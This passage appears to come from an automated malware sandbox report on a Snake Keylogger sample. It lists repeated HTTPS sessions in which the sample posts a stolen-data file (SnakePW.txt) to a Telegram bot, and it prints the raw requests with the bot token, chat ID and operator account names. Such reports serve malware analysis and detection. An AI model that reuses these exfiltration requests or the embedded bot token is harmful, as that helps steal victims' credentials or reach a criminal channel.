                            2022-06-26 07:33:10 UTC128OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 37 37 34 35 61 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e7745a71Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:10 UTC129INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:10 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:10 UTC129INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66832,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228790,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            77192.168.2.549907149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:10 UTC130OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e7aff527
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:10 UTC130OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 37 61 66 66 35 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e7aff527Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:11 UTC130INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:11 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:11 UTC131INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66833,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228791,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            78192.168.2.549909149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:11 UTC131OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e7e6cace
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:11 UTC132OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 37 65 36 63 61 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e7e6caceContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:11 UTC132INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:11 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:11 UTC132INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66834,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228791,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            79192.168.2.549911149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:12 UTC133OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e82bef06
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:12 UTC133OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 38 32 62 65 66 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e82bef06Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:12 UTC134INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:12 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:12 UTC134INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66836,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228792,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            8192.168.2.549776149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:41 UTC13OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d62b529c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:41 UTC13OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 36 32 62 35 32 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d62b529cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:41 UTC14INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:41 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:41 UTC14INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66754,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228761,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            80192.168.2.549913149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:12 UTC135OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e8a58707
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:12 UTC135OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 38 61 35 38 37 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e8a58707Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:12 UTC135INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:12 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:12 UTC136INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66837,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228792,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            81192.168.2.549914149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:13 UTC136OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e936f62b
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:13 UTC137OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 39 33 36 66 36 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e936f62bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:13 UTC137INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:13 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:13 UTC138INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66838,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228793,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            82192.168.2.549917149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:14 UTC138OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e98a6837
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:14 UTC138OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 39 38 61 36 38 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e98a6837Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:14 UTC139INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
